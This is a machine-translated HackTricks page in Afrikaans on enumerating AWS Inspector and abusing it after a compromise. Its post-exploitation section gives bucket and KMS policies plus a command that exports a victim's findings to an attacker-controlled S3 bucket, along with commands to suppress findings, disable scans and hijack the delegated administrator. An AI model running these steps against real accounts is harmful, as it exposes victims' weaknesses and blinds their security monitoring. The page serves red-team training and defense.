AWS - Inspector Enum
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die š¬ Discord group of die telegram group of volg ons op Twitter š¦ @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
Inspector
Amazon Inspector is ān gevorderde, outomatiese kwesbaarheidbestuurdiens wat ontwerp is om die sekuriteit van jou AWS-omgewing te verbeter. Hierdie diens skandeer deurlopend Amazon EC2-instanties, houerbeelde in Amazon ECR, Amazon ECS, en AWS Lambda-funksies vir kwesbaarhede en onbedoelde netwerkblootstelling. Deur ān robuuste kwesbaarheidintelligensiedatabasis te benut, bied Amazon Inspector gedetailleerde bevindings, insluitend ernsvlaktes en herstelaanbevelings, wat organisasies help om proaktief sekuriteitsrisikoās te identifiseer en aan te spreek. Hierdie omvattende benadering verseker ān versterkte sekuriteitsposisie oor verskeie AWS-dienste, wat help met nakoming en risiko-bestuur.
Key elements
Findings
Bevindings in Amazon Inspector is gedetailleerde verslae oor kwesbaarhede en blootstellings wat tydens die skandering van EC2-instanties, ECR-bewaarplekke, of Lambda-funksies ontdek is. Gebaseer op sy toestand, word bevindings gekategoriseer as:
- Aktief: Die bevinding is nie herstel nie.
- Gesluit: Die bevinding is herstel.
- Onderdruk: Die bevinding is met hierdie toestand gemerk weens een of meer onderdrukking reƫls.
Bevindings word ook in die volgende drie tipes gekategoriseer:
- Pakket: Hierdie bevindings hou verband met kwesbaarhede in sagtewarepakkette wat op jou hulpbronne geĆÆnstalleer is. Voorbeelde sluit verouderde biblioteke of afhanklikhede met bekende sekuriteitskwessies in.
- Kode: Hierdie kategorie sluit kwesbaarhede in die kode van toepassings wat op jou AWS-hulpbronne loop in. Algemene probleme is koderingfoute of onveilige praktyke wat tot sekuriteitsbreuke kan lei.
- Netwerk: Netwerkbevindinge identifiseer potensiƫle blootstellings in netwerkkonfigurasies wat deur aanvallers uitgebuit kan word. Hierdie sluit oop poorte, onveilige netwerkprotokolle, en verkeerd geconfigureerde sekuriteitsgroepe in.
Filters and Suppression Rules
Filters en onderdrukking reƫls in Amazon Inspector help om bevindings te bestuur en te prioritiseer. Filters laat jou toe om bevindings te verfyn op grond van spesifieke kriteria, soos erns of hulpbron tipe. Onderdrukking reƫls laat jou toe om sekere bevindings wat as lae risiko beskou word, wat reeds gemitigeer is, of vir enige ander belangrike rede, te onderdruk, wat voorkom dat hulle jou sekuriteitsverslae oorlaai en jou toelaat om op meer kritieke kwessies te fokus.
Software Bill of Materials (SBOM)
ān Software Bill of Materials (SBOM) in Amazon Inspector is ān uitvoerbare geneste inventarislis wat al die komponente binne ān sagtewarepakket in detail uiteensit, insluitend biblioteke en afhanklikhede. SBOMās help om deursigtigheid in die sagtewarevoorsieningsketting te bied, wat beter kwesbaarheidbestuur en nakoming moontlik maak. Hulle is van kardinale belang om risikoās wat verband hou met oopbron- en derdeparty-sagtewarekomponente te identifiseer en te mitigeer.
Key features
Export findings
Amazon Inspector bied die vermoĆ« om bevindings na Amazon S3 Buckets, Amazon EventBridge en AWS Security Hub te eksporteer, wat jou in staat stel om gedetailleerde verslae van geĆÆdentifiseerde kwesbaarhede en blootstellings vir verdere analise of deel op ān spesifieke datum en tyd te genereer. Hierdie funksie ondersteun verskeie uitvoerformate soos CSV en JSON, wat dit makliker maak om met ander gereedskap en stelsels te integreer. Die uitvoerfunksionaliteit laat aanpassing van die data wat in die verslae ingesluit is toe, wat jou in staat stel om bevindings te filter op grond van spesifieke kriteria soos erns, hulpbron tipe, of datumbereik en sluit standaard al jou bevindings in die huidige AWS-streek met ān Aktiewe status in.
Wanneer bevindings uitgevoer word, is ān Key Management Service (KMS) sleutel nodig om die data tydens uitvoer te enkripteer. KMS sleutels verseker dat die uitgevoerde bevindings teen ongemagtigde toegang beskerm word, wat ān ekstra laag sekuriteit vir sensitiewe kwesbaarheidinligting bied.
Amazon EC2 instances scanning
Amazon Inspector bied robuuste skandeervermoƫns vir Amazon EC2-instanties om kwesbaarhede en sekuriteitskwessies te detecteer. Inspector het onttrokken metadata van die EC2-instantie vergelyk met reƫls van sekuriteitsadvies om pakketskwesbaarhede en netwerkbereikbaarheidkwessies te produseer. Hierdie skanderings kan uitgevoer word deur agent-gebaseerde of agentlose metodes, afhangende van die skandeermodus instellingskonfigurasie van jou rekening.
- Agent-GeBASEER: Gebruik die AWS Systems Manager (SSM) agent om diepgaande skanderings uit te voer. Hierdie metode laat vir omvattende dataversameling en -analise direk vanaf die instantie toe.
- Agentlose: Bied ān liggewig alternatief wat nie die installering van ān agent op die instantie vereis nie, deur ān EBS-snapshots van elke volume van die EC2-instantie te skep, op soek na kwesbaarhede, en dit dan te verwyder; benut bestaande AWS-infrastruktuur vir skandering.
Die skandeermodus bepaal watter metode gebruik sal word om EC2-skanderings uit te voer:
- Agent-GeBASEER: Betrek die installering van die SSM-agent op EC2-instanties vir diep inspeksie.
- Hibrid Skandering: Kombineer beide agent-gebaseerde en agentlose metodes om dekking te maksimeer en prestasie-impak te minimaliseer. In daardie EC2-instanties waar die SSM-agent geĆÆnstalleer is, sal Inspector ān agent-gebaseerde skandering uitvoer, en vir diegene waar daar geen SSM-agent is nie, sal die skandering agentloos wees.
Nog ān belangrike kenmerk is die diep inspeksie vir EC2 Linux-instanties. Hierdie kenmerk bied deeglike analise van die sagteware en konfigurasie van EC2 Linux-instanties, wat gedetailleerde kwesbaarheidbeoordelings bied, insluitend bedryfstelsels kwesbaarhede, toepassings kwesbaarhede, en verkeerde konfigurasies, wat ān omvattende sekuriteitsevaluasie verseker. Dit word bereik deur die inspeksie van aangepaste paaie en al sy sub-gidse. Standaard sal Amazon Inspector die volgende skandeer, maar elke lidrekening kan tot 5 meer aangepaste paaie definieer, en elke gedelegeerde administrateur tot 10:
/usr/lib/usr/lib64/usr/local/lib/usr/local/lib64
Amazon ECR container images scanning
Amazon Inspector bied robuuste skandeervermoƫns vir Amazon Elastic Container Registry (ECR) houerbeelde, wat verseker dat pakketskwesbaarhede doeltreffend gedetecteer en bestuur word.
- Basiese Skandering: Dit is ān vinnige en liggewig skandering wat bekende OS-pakketskwesbaarhede in houerbeelde identifiseer met behulp van ān standaard stel reĆ«ls van die oopbron Clair-projek. Met hierdie skandeer konfigurasie sal jou bewaringe geskandeer word op druk, of deur handmatige skanderings uit te voer.
- Verbeterde Skandering: Hierdie opsie voeg die deurlopende skandeerfunksie by, benewens die op druk skandering. Verbeterde skandering delf dieper in die lae van elke houerbeeld om kwesbaarhede in OS-pakkette en in programmeringstaal pakkette met hoĆ«r akkuraatheid te identifiseer. Dit analiseer beide die basisbeeld en enige addisionele lae, wat ān omvattende oorsig van potensiĆ«le sekuriteitskwessies bied.
Amazon Lambda functions scanning
Amazon Inspector sluit omvattende skandeervermoƫns vir AWS Lambda-funksies en sy lae in, wat die sekuriteit en integriteit van serverless toepassings verseker. Inspector bied twee tipes skandering vir Lambda-funksies:
- Lambda standaard skandering: Hierdie standaardfunksie identifiseer sagtewarekwesbaarhede in die toepassingspakket afhanklikhede wat by jou Lambda-funksie en lae gevoeg is. Byvoorbeeld, as jou funksie ān weergawe van ān biblioteek soos python-jwt met ān bekende kwesbaarheid gebruik, genereer dit ān bevinding.
- Lambda kode skandering: Analiseer aangepaste toepassingskode vir sekuriteitskwessies, wat kwesbaarhede soos inspuitingsfoute, datalekke, swak kriptografie, en ontbrekende enkripsie opspoor. Dit vang kode-snippets wat gedetecteerde kwesbaarhede uitlig, soos hardgecodeerde akrediteer. Bevindings sluit gedetailleerde herstelvoorstelle en kode-snippets in om die probleme op te los.
Center for Internet Security (CIS) scans
Amazon Inspector sluit CIS-skanderings in om Amazon EC2-instantie bedryfstelsels teen beste praktyk aanbevelings van die Center for Internet Security (CIS) te benchmark. Hierdie skanderings verseker dat konfigurasies aan industrie-standaard sekuriteitsbaselines voldoen.
- Konfigurasie: CIS-skanderings evalueer of stelsels se konfigurasies aan spesifieke CIS Benchmark-aanbevelings voldoen, met elke kontrole wat aan ān CIS kontrole-ID en titel gekoppel is.
- Uitvoering: Skanderings word uitgevoer of geskeduleer op grond van instantie etikette en gedefinieerde skedules.
- Resultate: Na-skandeer resultate dui aan watter kontroles geslaag het, oorgeslaan is, of gefaal het, wat insig bied in die sekuriteitsposisie van elke instantie.
Enumeration
# Administrator and member accounts #
## Retrieve information about the AWS Inpsector delegated administrator for your organization (ReadOnlyAccess policy is enough for this)
aws inspector2 get-delegated-admin-account
## List the members who are associated with the AWS Inspector administrator account (ReadOnlyAccess policy is enough for this)
aws inspector2 list-members [--only-associated | --no-only-associated]
## Retrieve information about a member account (ReadOnlyAccess policy is enough for this)
aws inspector2 get-member --account-id <value>
## Retrieve the status of AWS accounts within your environment (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-account-status [--account-ids <value>]
## Retrieve the free trial status for the specified accounts (ReadOnlyAccess policy is enough for this)
aws inspector2 batch-get-free-trial-info --account-ids <value>
## Retrieve the EC2 Deep Inspection status for the member accounts (Requires to be the delegated administrator)
aws inspector2 batch-get-member-ec2-deep-inspection-status [--account-ids <value>]
## List an account's permissions associated with AWS Inspector
aws inspector2 list-account-permissions
# Findings #
## List a subset of information of the findings for your envionment (ReadOnlyAccess policy is enough for this)
aws inspector2 list-findings
## Retrieve vulnerability intelligence details for the specified findings
aws inspector2 batch-get-finding-details --finding-arns <value>
## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
## Retrieve code snippet information about one or more specified code vulnerability findings
aws inspector2 batch-get-code-snippet --finding-arns <value>
## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
aws inspector2 get-findings-report-status --report-id <value>
# CIS #
## List CIS scan configurations (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scan-configurations
## List the completed CIS scans (ReadOnlyAccess policy is enough for this)
aws inspector2 list-cis-scans
## Retrieve a report from a completed CIS scan
aws inspector2 get-cis-scan-report --scan-arn <value> [--target-accounts <value>]
## Retrieve details about the specific CIS scan over the specified resource
aws inspector2 get-cis-scan-result-details --account-id <value> --scan-arn <value> --target-resource-id <value>
## List CIS scan results broken down by check
aws inspector2 list-cis-scan-results-aggregated-by-checks --scan-arn <value>
## List CIS scan results broken down by target resource
aws inspector2 list-cis-scan-results-aggregated-by-target-resource --scan-arn <value>
# Configuration #
## Describe AWS Inspector settings for AWS Organization (ReadOnlyAccess policy is enough for this)
aws inspector2 describe-organization-configuration
## Retrieve the configuration settings about EC2 scan and ECR re-scan
aws inspector2 get-configuration
## Retrieve EC2 Deep Inspection configuration associated with your account
aws inspector2 get-ec2-deep-inspection-configuration
# Miscellaneous #
## Retrieve the details of a Software Bill of Materials (SBOM) report
aws inspector2 get-sbom-export --report-id <value>
## Retrieve the coverage details for the specified vulnerabilities
aws inspector2 search-vulnerabilities --filter-criteria <vulnerabilityIds=id1,id2..>
## Retrieve the tags attached to the specified resource
aws inspector2 list-tags-for-resource --resource-arn <value>
## Retrieve the AWS KMS key used to encrypt the specified code snippets
aws inspector2 get-encryption-key --resource-type <AWS_EC2_INSTANCE | AWS_ECR_CONTAINER_IMAGE | AWS_ECR_REPOSITORY | AWS_LAMBDA_FUNCTION> --scan-type <NETWORK | PACKAGE | CODE>
## List the filters associated to your AWS account
aws inspector2 list-filters
## List the types of statistics AWS Inspector can generate (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage
## Retrieve statistical data and about the resources AWS Inspector monitors (ReadOnlyAccess policy is enough for this)
aws inspector2 list-coverage-statistics
## List the aggregated usage total over the last 30 days
aws inspector2 list-usage-totals [--account-ids <value>]
### INSPECTOR CLASSIC ###
## Assessments info, there is a "describe" action for each one to get more info
aws inspector list-assessment-runs
aws inspector list-assessment-targets
aws inspector list-assessment-templates
aws inspector list-event-subscriptions
## Get findings
aws inspector list-findings
## Get exclusions
aws inspector list-exclusions --assessment-run-arn <arn>
## Rule packages
aws inspector list-rules-packages
Post Exploitation
Tip
Vanuit ān aanvaller se perspektief kan hierdie diens die aanvaller help om kwesbaarhede en netwerkblootstellings te vind wat hom kan help om ander instansies/tenks te kompromitteer.
egter, ān aanvaller kan ook belangstel om hierdie diens te ontwrig sodat die slagoffer nie kwesbaarhede kan sien nie (alle of spesifieke).
inspector2:CreateFindingsReport, inspector2:CreateSBOMReport
ān Aanvaller kan gedetailleerde verslae van kwesbaarhede of sagtewarerekening van materiale (SBOMs) genereer en dit uit jou AWS-omgewing uitvoer. Hierdie inligting kan benut word om spesifieke swakpunte, verouderde sagteware of onveilige afhanklikhede te identifiseer, wat gerigte aanvalle moontlik maak.
# Findings report
aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
# SBOM report
aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]
Die volgende voorbeeld toon hoe om al die Aktiewe bevindings van Amazon Inspector na ān aanvaller-beheerde Amazon S3-bucket te eksfiltreer met ān aanvaller-beheerde Amazon KMS-sleutel:
- Skep ān Amazon S3-bucket en heg ān beleid daaraan om dit vanaf die slagoffer Amazon Inspector toeganklik te maak:
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "allow-inspector",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"],
"Resource": "arn:aws:s3:::inspector-findings/*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
},
"ArnLike": {
"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
}
}
}
]
}
- Skep ān Amazon KMS-sleutel en heg ān beleid daaraan sodat dit deur die slagoffer se Amazon Inspector gebruik kan word:
{
"Version": "2012-10-17",
"Id": "key-policy",
"Statement": [
{
...
},
{
"Sid": "Allow victim Amazon Inspector to use the key",
"Effect": "Allow",
"Principal": {
"Service": "inspector2.amazonaws.com"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*",
"Condition": {
"StringEquals": {
"aws:SourceAccount": "<victim-account-id>"
}
}
}
]
}
- Voer die opdrag uit om die bevindingsverslag te skep deur dit te exfiltreer:
aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
- Potensiƫle Impak: Generasie en ekfiltrasie van gedetailleerde kwesbaarheid en sagteware verslae, insigte verkry in spesifieke kwesbaarhede en sekuriteits swakhede.
inspector2:CancelFindingsReport, inspector2:CancelSbomExport
ān Aanvaller kan die generasie van die gespesifiseerde bevindingsverslag of SBOM-verslag kanselleer, wat verhoed dat sekuriteitspanne tydige inligting oor kwesbaarhede en sagteware rekening van materiale (SBOMs) ontvang, wat die opsporing en herstel van sekuriteitskwessies vertraag.
# Cancel findings report generation
aws inspector2 cancel-findings-report --report-id <value>
# Cancel SBOM report generatiom
aws inspector2 cancel-sbom-export --report-id <value>
- Potensiƫle Impak: Ontwrichting van sekuriteitsmonitering en voorkoming van tydige opsporing en herstel van sekuriteitskwessies.
inspector2:CreateFilter, inspector2:UpdateFilter, inspector2:DeleteFilter
ān Aanvaller met hierdie toestemmings sou in staat wees om die filterreĆ«ls te manipuleer wat bepaal watter kwesbaarhede en sekuriteitskwessies gerapporteer of onderdruk word (as die aksie op SUPPRESS gestel is, sou ān onderdrukkingsreĆ«l geskep word). Dit kan kritieke kwesbaarhede van sekuriteitsadministrateurs verberg, wat dit makliker maak om hierdie swakhede sonder opsporing te benut. Deur belangrike filters te verander of te verwyder, kan ān aanvaller ook geraas skep deur die stelsel met irrelevante bevindings te oorstroom, wat effektiewe sekuriteitsmonitering en -reaksie belemmer.
# Create
aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
# Update
aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [--filter-criteria <value>] [--reason <value>]
# Delete
aws inspector2 delete-filter --arn <value>
- Potensiƫle Impak: Verberging of onderdrukking van kritieke kwesbaarhede, of oorstroming van die stelsel met irrelevante bevindings.
inspector2:DisableDelegatedAdminAccount, (inspector2:EnableDelegatedAdminAccount & organizations:ListDelegatedAdministrators & organizations:EnableAWSServiceAccess & iam:CreateServiceLinkedRole)
ān Aanvaller kan die sekuriteitsbestuursstruktuur aansienlik ontwrig.
- Deur die gedelegeerde administrateurrekening te deaktiveer, kan die aanvaller die sekuriteitspan verhinder om toegang te verkry tot en die Amazon Inspector-instellings en -verslae te bestuur.
- Deur ān ongeoorloofde administrateurrekening te aktiveer, kan ān aanvaller sekuriteitskonfigurasies beheer, wat moontlik skandeer kan deaktiveer of instellings kan wysig om kwaadwillige aktiwiteite te verberg.
Warning
Dit is vereis dat die ongeoorloofde rekening in dieselfde Organisasie as die slagoffer is om die gedelegeerde administrateur te word.
Ten einde vir die ongeoorloofde rekening om die gedelegeerde administrateur te word, is dit ook vereis dat nadat die wettige gedelegeerde administrateur gedeaktiveer is, en voordat die ongeoorloofde rekening as die gedelegeerde administrateur geaktiveer word, die wettige administrateur as die gedelegeerde administrateur uit die organisasie moet word. Dit kan gedoen word met die volgende opdrag (
organizations:DeregisterDelegatedAdministratortoestemming vereis):aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)
# Disable
aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
# Enable
aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>
- Potensiƫle Impak: Ontwrichting van die sekuriteitsbestuur.
inspector2:AssociateMember, inspector2:DisassociateMember
ān Aanvaller kan die assosiasie van lid rekeninge binne ān Amazon Inspector-organisasie manipuleer. Deur ongeoorloofde rekeninge te assosieer of legitieme te disassosieer, kan ān aanvaller beheer oor watter rekeninge ingesluit word in sekuriteitskanderings en verslagdoening. Dit kan lei tot kritieke rekeninge wat uitgesluit word van sekuriteitsmonitering, wat die aanvaller in staat stel om kwesbaarhede in daardie rekeninge te benut sonder opsporing.
Warning
Hierdie aksie moet deur die gedelegeerde administrateur uitgevoer word.
# Associate
aws inspector2 associate-member --account-id <value>
# Disassociate
aws inspector2 disassociate-member --account-id <value>
- Potensiƫle Impak: Uitsluiting van sleutelrekeninge uit sekuriteitsskande, wat ongekende uitbuiting van kwesbaarhede moontlik maak.
inspector2:Disable, (inspector2:Enable & iam:CreateServiceLinkedRole)
ān Aanvaller met die inspector2:Disable toestemming sal in staat wees om sekuriteitsskande op spesifieke hulpbron tipes (EC2, ECR, Lambda, Lambda kode) oor die gespesifiseerde rekeninge te deaktiveer, wat dele van die AWS-omgewing onbeheerd en kwesbaar vir aanvalle laat. Daarbenewens, as gevolg van die inspector2:Enable & iam:CreateServiceLinkedRole toestemmings, kan ān aanvaller dan selektief skande heraktiveer om opsporing van verdagte konfigurasies te vermy.
Warning
Hierdie aksie moet deur die gedelegeerde administrateur uitgevoer word.
# Disable
aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
# Enable
aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]
- Potensiƫle Impak: Skepping van blinde kolle in die sekuriteitsmonitering.
inspector2:UpdateOrganizationConfiguration
ān Aanvaller met hierdie toestemming sal in staat wees om die konfigurasies vir jou Amazon Inspector-organisasie op te dateer, wat die standaard skandeerfunksies wat vir nuwe lid rekeninge geaktiveer is, beĆÆnvloed.
Warning
Hierdie aksie moet deur die gedelegeerde administrateur uitgevoer word.
aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
- Potensiƫle Impak: Verander sekuriteitskande beleide en konfigurasies vir die organisasie.
inspector2:TagResource, inspector2:UntagResource
ān Aanvaller kan etikette op AWS Inspector hulpbronne manipuleer, wat krities is vir die organiseer, opspoor en outomatiseer van sekuriteitsassesseringe. Deur etikette te verander of te verwyder, kan ān aanvaller potensieel kwesbaarhede van sekuriteitskande verberg, nakomingsverslaggewing ontwrig, en inmeng met outomatiese herstelprosesse, wat lei tot onbeheerde sekuriteitskwessies en gecompromitteerde stelselintegriteit.
aws inspector2 tag-resource --resource-arn <value> --tags <value>
aws inspector2 untag-resource --resource-arn <value> --tag-keys <value>
- Potensiƫle Impak: Versteeking van kwesbaarhede, ontwrigting van nakomingsverslagdoening, ontwrigting van sekuriteitsautomatisering en ontwrigting van koste-toewysing.
Verwysings
- https://docs.aws.amazon.com/inspector/latest/user/what-is-inspector.html
- https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoninspector2.html
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die š¬ Discord group of die telegram group of volg ons op Twitter š¦ @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
HackTricks Cloud

